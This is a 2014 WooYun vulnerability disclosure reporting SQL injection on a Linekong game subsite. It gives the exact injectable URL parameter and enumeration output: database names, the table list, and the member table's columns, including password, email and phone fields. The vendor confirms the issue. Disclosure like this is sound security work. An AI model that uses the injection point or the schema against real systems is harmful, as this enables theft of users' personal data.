漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-052578
漏洞标题:蓝港在线分站有注入!(热血西游官方网站)
相关厂商:linekong.com
漏洞作者: →Hack涛
提交时间:2014-03-04 12:43
修复时间:2014-04-18 12:44
公开时间:2014-04-18 12:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-04: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-14: 细节向核心白帽子及相关领域专家公开
2014-03-24: 细节向普通白帽子公开
2014-04-03: 细节向实习白帽子公开
2014-04-18: 细节向公众公开
简要描述:
如题
详细说明:
注入点: http://rx.8864.com/imagelist.php?sort_id=87
数据库:
available databases [2]:
[*] information_schema
[*] rxxy_web
漏洞证明:
数据库:
available databases [2]:
[*] information_schema
[*] rxxy_web
[*] rxxy_web的表段:
+------------------------------+
| rxxy_activity_firstjh_cdkey |
| rxxy_activity_firstjh_log |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote |
| rxxy_address |
| rxxy_article |
| rxxy_article_inserl |
| rxxy_build |
| rxxy_channel |
| rxxy_columns |
| rxxy_comment |
| rxxy_download |
| rxxy_editors_inserl |
| rxxy_flash |
| rxxy_grading |
| rxxy_group |
| rxxy_image |
| rxxy_image_inserl |
| rxxy_member |
| rxxy_passportstat |
| rxxy_sort |
| rxxy_template |
| rxxy_url |
| rxxy_url_inserl |
| rxxy_vote |
| rxxy_vote_inserl |
| rxxy_vote_option |
| rxxy_wj_article |
| rxxy_wj_article_inserl |
| rxxy_wj_image |
| rxxy_wj_image_inserl |
+------------------------------+
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
修复方案:
防注入!过滤!感觉密码好弱!有的是简写!要加强密码!没有脱裤哦!
版权声明:转载请注明来源 →Hack涛@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-03-04 19:25
厂商回复:
非常感谢,马上会安排人修复。
最新状态:
暂无